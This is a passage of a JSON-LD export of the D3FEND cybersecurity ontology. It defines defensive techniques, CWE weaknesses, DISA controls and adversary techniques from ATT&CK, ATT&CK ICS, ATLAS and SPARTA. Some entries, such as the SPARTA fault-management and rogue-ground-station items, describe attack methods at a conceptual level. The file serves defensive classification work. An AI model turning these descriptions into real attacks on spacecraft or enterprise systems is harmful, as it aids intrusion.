      "@id": "d3f:AuthenticationEventThresholding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AuthenticationEventThresholding"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authentication"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ANET",
      "d3f:definition": "Collecting authentication events, creating a baseline user profile, and determining whether authentication events are consistent with the baseline profile.",
      "d3f:kb-article": "## How it works\nAuthentication event data is collected (logon information such as device id, time of day, day of week, geo-location, etc.) to create an activity baseline. Then, a threshold is determined either through a manually specified configuration, or a statistical analysis of deviations in historical data. New authentication events are evaluated to determine if a threshold is exceeded. Thresholds can be static or dynamic.\n\n### Actions\nAs a result of the analysis, actions taken could include:\n\n* [Account Locking](/technique/d3f:AccountLocking)\n* Raising an alert\n\n### Example data sources\n * Directory server logs\n * VPN Server logs\n * IDAM Capability logs\n * NAC logs\n * Authentication client logs\n * Kerberos network traffic\n * LDAP network traffic\n\n## Considerations\n\nThis technique covers statistical outliers. Though depending on the complexity or dimensionality of the data considered, outliers may not be obvious to a human analyst reviewing events in simplistic analytic views. If the malicious activity is not statistically different from benign activity, an alert threshold will not be met.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-SimultaneousLoginsOnAHost_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoginActivityMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Authentication Event Thresholding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:Nb380846e7e4b4de6ac7bf4b425c7065e"
        }
      ]
    },
    {
      "@id": "_:Nb380846e7e4b4de6ac7bf4b425c7065e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:DS0038",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Domain Name (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1558.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.005",
      "d3f:definition": "Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials.",
      "rdfs:label": "Ccache Files",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:EX-0018.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.01",
      "d3f:definition": "An EMP delivers a broadband, high-amplitude electromagnetic transient that couples into spacecraft electronics and harnesses, upsetting or damaging components over wide areas. In space, the archetype is a high-altitude nuclear event whose prompt fields induce immediate upsets and whose secondary radiation environment elevates dose and charging for an extended period along affected orbits. Consequences include widespread single-event effects, latch-ups, permanent degradation of sensitive devices, and accelerated aging of solar arrays and materials. The effect envelope is large and largely indiscriminate: multiple satellites within view can experience simultaneous anomalies consistent with intense electromagnetic stress and enhanced radiation.",
      "rdfs:label": "Electromagnetic Pulse (EMP) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "Electromagnetic Pulse (EMP)"
    },
    {
      "@id": "d3f:BooleanExpressionMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BEM",
      "d3f:definition": "Boolean expression matching produces a Boolean truth value for a given boolean expression and assignment of values to variables in the expression.",
      "d3f:kb-article": "## How it works\nA Boolean expression is an expression used in programming languages that produces a Boolean value when evaluated. A Boolean value is either true or false. A Boolean expression may be composed of a combination of the Boolean constants true or false, Boolean-typed variables, Boolean-valued operators, and Boolean-valued functions.\n\nBoolean expressions correspond to propositional formulas in logic and are a special case of Boolean circuits.\n\n## References\n1. Boolean expression. (2022, April 25). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Boolean_expression)\n2. Boolean algebra. (2022, May 19). In _Wikipedia_.\n[Link](https://en.wikipedia.org/wiki/Boolean_expression)",
      "rdfs:label": "Boolean Expression Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:T1183",
      "@type": "owl:Class",
      "d3f:attack-id": "T1183",
      "d3f:definition": "Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g  notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.012",
      "rdfs:label": "Image File Execution Options Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.012"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ContainerImageAnalysis",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/0/CTR_Kubernetes_Hardening_Guidance_1.1_20220315.PDF"
      },
      "d3f:kb-abstract": "Container Images can contain unneeded, unsecured or insecure files.\n        By analyzing the container image, we can identify whether it respects\n        a specific set of predefined policies.",
      "d3f:kb-author": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:ContainerImageAnalysis"
      },
      "d3f:kb-reference-title": "Kubernetes Hardening Guide",
      "rdfs:label": "Reference - Container Image Analysis"
    },
    {
      "@id": "d3f:ClusterAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CA",
      "d3f:definition": "Cluster analysis or clustering is the task of grouping a set of objects in such a way that objects in the same group (called a cluster) are more similar (in some sense) to each other than to those in other groups (clusters).",
      "d3f:kb-article": "## References\nCluster analysis. (n.d.). Wikipedia. [Link](https://en.wikipedia.org/wiki/Cluster_analysis)",
      "rdfs:label": "Cluster Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:T0855",
      "@type": "owl:Class",
      "d3f:attack-id": "T0855",
      "d3f:definition": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
      "rdfs:label": "Unauthorized Command Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Unauthorized Command Message"
    },
    {
      "@id": "d3f:CWE-149",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-149",
      "d3f:definition": "Quotes injected into a product can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions.",
      "rdfs:label": "Improper Neutralization of Quoting Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:ServiceDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A service dependency indicates a service has an activity, agent, or another service which relies on it in order to be functional.",
      "rdfs:label": "Service Dependency",
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:M1032",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "Multi-factor Authentication"
    },
    {
      "@id": "d3f:FileDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is permanently removed from the file system or storage medium, potentially triggering actions related to data retention or recovery.",
      "rdfs:label": "File Deletion Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEPOKETEXT",
      "@type": "owl:Class",
      "d3f:definition": "Copy the word data to the address addr in the tracee's memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_POKETEXT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:IA-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0008.01",
      "d3f:definition": "Adversaries may field their own ground system, transportable or fixed, to transmit and receive mission-compatible signals. A typical setup couples steerable apertures and GPS-disciplined timing with SDR/modems configured for the target’s bands, modulation/coding, framing, and beacon structure. Using pass schedules and Doppler/polarization predictions, the actor crafts over-the-air traffic that appears valid at the RF and protocol layers.",
      "rdfs:label": "Rogue Ground Station - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0008"
      },
      "skos:prefLabel": "Rogue Ground Station"
    },
    {
      "@id": "d3f:CWE-1329",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1329",
      "d3f:definition": "The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.",
      "rdfs:label": "Reliance on Component That is Not Updateable",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1357"
        },
        {
          "@id": "d3f:CWE-664"
        }
      ]
    },
    {
      "@id": "d3f:DimensionReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DR",
      "d3f:definition": "Dimensionality reduction is a key technique within unsupervised learning. It compresses the data by finding a smaller, different set of variables that capture what matters most in the original features, while minimizing the loss of information.",
      "d3f:kb-article": "## References\nO'Reilly Media. (n.d.). Chapter 7. Machine Learning and Security: Protecting Systems with Data and Algorithms. [Link](https://www.oreilly.com/library/view/machine-learning-and/9781492073048/ch07.html)",
      "rdfs:label": "Dimension Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.09",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.09",
      "d3f:definition": "Fault management (FDIR/autonomy/safing) materials are a prime reconnaissance target because they encode how the spacecraft detects, classifies, and responds to off-nominal states. Adversaries seek trigger thresholds and persistence timers, voting logic, inhibit and recovery ladders, safe-mode entry/exit criteria, command authority in safed states, watchdog/reset behavior, and any differences between flight and maintenance builds. Artifacts include fault trees, FMEAs, autonomy rule tables, safing flowcharts, and anomaly response playbooks. With these, a threat actor can craft inputs that remain just below detection thresholds, stack benign-looking events to cross safing boundaries at tactically chosen times, or exploit recovery windows when authentication, visibility, or redundancy is reduced. Knowledge of what telemetry is suppressed or rate-limited during safing further aids concealment.",
      "rdfs:label": "Fault Management - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/09/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Fault Management"
    },
    {
      "@id": "d3f:CCI-002384_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents unauthorized information transfer via shared resources in accordance with organization-defined procedures when system processing explicitly switches between different information classification levels or security categories.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002384"
    },
    {
      "@id": "d3f:AML.T0048.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.001",
      "d3f:definition": "Reputational harm involves a degradation of public perception and trust in organizations.  Examples of reputation-harming incidents include scandals or false impersonations.",
      "rdfs:label": "Reputational Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Reputational Harm"
    },
    {
      "@id": "d3f:T1098.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.007",
      "d3f:definition": "An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.",
      "rdfs:label": "Additional Local or Domain Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtOpenFile routine opens an existing file, directory, device, or volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntopenfile"
      },
      "rdfs:label": "Windows NtOpenFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:Reference-Windows-Management-Infrastructure",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmi_v2/windows-management-infrastructure"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Windows Management Infrastructure",
      "rdfs:label": "Reference - Windows Management Infrastructure (MI)"
    },
    {
      "@id": "d3f:T1137",
      "@type": "owl:Class",
      "d3f:attack-id": "T1137",
      "d3f:definition": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.",
      "rdfs:label": "Office Application Startup",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-508",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-508",
      "d3f:definition": "Non-replicating malicious code only resides on the target system or product that is attacked; it does not attempt to spread to other systems.",
      "rdfs:label": "Non-Replicating Malicious Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-507"
      }
    },
    {
      "@id": "d3f:T1186",
      "@type": "owl:Class",
      "d3f:attack-id": "T1186",
      "d3f:definition": "Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.013",
      "rdfs:label": "Process Doppelgänging",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.013"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:DomainLogicValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainLogicValidation"
      ],
      "d3f:d3fend-id": "D3-DLV",
      "d3f:definition": "Validation of variable state in the context of the domain application.",
      "d3f:kb-article": "## How it works\nValidates the type, value, and/or range of a variable, taking into account the context of the current application in the business domain.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:validates": {
        "@id": "d3f:Subroutine"
      },
      "rdfs:label": "Domain Logic Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Nea9eb574f3394ed495a9f5a6277a1b5d"
        }
      ]
    },
    {
      "@id": "_:Nea9eb574f3394ed495a9f5a6277a1b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:HTTPPostEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP POST method is used to submit data to the specified resource, often causing a change in state or side effects on the server.",
      "rdfs:label": "HTTP POST Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-839",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-839",
      "d3f:definition": "The product checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum.",
      "d3f:synonym": "Signed comparison",
      "rdfs:label": "Numeric Range Comparison Without Minimum Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:ExecutableBinary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:ImageCodeSegment"
        },
        {
          "@id": "d3f:ImageDataSegment"
        }
      ],
      "d3f:definition": "An executable binary contains machine code instructions for a physical CPU. D3FEND also considers byte code for a virtual machine to be binary code.  This is in contrast to executable scripts written in a scripting language.",
      "d3f:may-interpret": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Executable Binary",
      "rdfs:seeAlso": {
        "@id": "dbr:Executable"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableFile"
        },
        {
          "@id": "_:Nea1d1b22a015433cbd3f2281c90e54c2"
        },
        {
          "@id": "_:N95c0c2f469cb4f52b02a087905fb3bfb"
        },
        {
          "@id": "_:N547174a4af6d49f4a5e5f8eaf5fbe029"
        }
      ]
    },
    {
      "@id": "_:Nea1d1b22a015433cbd3f2281c90e54c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageCodeSegment"
      }
    },
    {
      "@id": "_:N95c0c2f469cb4f52b02a087905fb3bfb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ImageDataSegment"
      }
    },
    {
      "@id": "_:N547174a4af6d49f4a5e5f8eaf5fbe029",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-interpret"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:DatabaseQueryStringAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DatabaseQueryStringAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:d3fend-id": "D3-DQSA",
      "d3f:definition": "Analyzing database queries to detect [SQL Injection](https://capec.mitre.org/data/definitions/66.html).",
      "d3f:kb-article": "## How it works\n\nSome implementations use software hooks to intercept function calls related to database query operations. Other implementations might intercept or collect network traffic. The database query string is then extracted and analyzed with various methods, for example:\n* Detecting specific administrative SQL commands\n* Anomalous sequences of commands when compared to a statistical baseline.\n* Anomalous commands for a given user role.\n\n## Considerations\n\nSome capabilities sanitize queries before permitting them to be transmitted to the database. This incurs risks such as altering data in an undesired way or breaking application functionality.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForInternetSecurity_CylanceInc"
      },
      "rdfs:label": "Database Query String Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Ncb461d6b57584e358e024021fc69baad"
        }
      ]
    },
    {
      "@id": "_:Ncb461d6b57584e358e024021fc69baad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "d3f:TA0041",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Execution - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001242_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures malicious code protection mechanisms to perform real-time scans of files from external sources at endpoints as the files are downloaded, opened, or executed in accordance with organizational security policy.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001242"
    },
    {
      "@id": "d3f:T1505.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1505.001",
      "d3f:creates": {
        "@id": "d3f:StoredProcedure"
      },
      "d3f:definition": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "SQL Stored Procedures",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:Ne0275fd6bac643f29e346a705125314a"
        },
        {
          "@id": "_:N3ab011fbc4a0402e99057e2e2ae21a5a"
        }
      ]
    },
    {
      "@id": "_:Ne0275fd6bac643f29e346a705125314a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StoredProcedure"
      }
    },
    {
      "@id": "_:N3ab011fbc4a0402e99057e2e2ae21a5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:ReferenceNullification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-RN",
      "d3f:definition": "Invalidating all pointers that reference a specific memory block, ensuring that the block cannot be accessed or modified after deallocation.",
      "d3f:hardens": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "d3f:kb-article": "## How it Works\nNullifying references to memory blocks makes those blocks no longer accessible. This is critical to prevent use-after-free errors.\n\n## Considerations\n* If a memory block is freed, all other references to that block should be nullified.\n* This is particularly relevant when manually managing memory.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ReferenceNullification_SecureSoftwareInc"
      },
      "rdfs:label": "Reference Nullification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:Na9828da9f6fa496f9a9425398a85d9dc"
        }
      ]
    },
    {
      "@id": "_:Na9828da9f6fa496f9a9425398a85d9dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:MemoryPool",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "Memory pools, also called fixed-size blocks allocation, is the use of pools for memory management… preallocating a number of memory blocks with the same size called the memory pool. The application can allocate, access, and free blocks represented by handles at run time.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Memory_pool"
      },
      "rdfs:label": "Memory Pool",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "_:Nf52e94a79efd419fa3e649ed84c2c580"
        }
      ]
    },
    {
      "@id": "_:Nf52e94a79efd419fa3e649ed84c2c580",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1564.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.008",
      "d3f:definition": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)",
      "d3f:may-create": {
        "@id": "d3f:EmailRule"
      },
      "d3f:may-modify": {
        "@id": "d3f:EmailRule"
      },
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Email Hiding Rules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N14cf88cd426d454683e33345395d09b9"
        },
        {
          "@id": "_:Na67dad56544e4655a1a708ab5010006d"
        },
        {
          "@id": "_:N394ba9b303074cafae6917b0c957ac58"
        }
      ]
    },
    {
      "@id": "_:N14cf88cd426d454683e33345395d09b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailRule"
      }
    },
    {
      "@id": "_:Na67dad56544e4655a1a708ab5010006d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EmailRule"
      }
    },
    {
      "@id": "_:N394ba9b303074cafae6917b0c957ac58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:BayesOptimalClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOC",
      "d3f:definition": "A probabilistic model that makes the most probable prediction for a new example.",
      "d3f:kb-article": "## References\nBayes Optimal Classifier. Machine Learning Mastery.  [Link](https://machinelearningmastery.com/bayes-optimal-classifier/).\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Bayes Optimal Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-339",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-339",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks.",
      "rdfs:label": "Small Seed Space in PRNG",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:ATTACKICSExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0104"
      },
      "rdfs:label": "Execution Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nea572839c0fb44d78eb8316e229d786b"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:Nea572839c0fb44d78eb8316e229d786b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0104"
      }
    },
    {
      "@id": "d3f:CCI-002207_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates destination by organization, system, application, and/or individual for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002207"
    },
    {
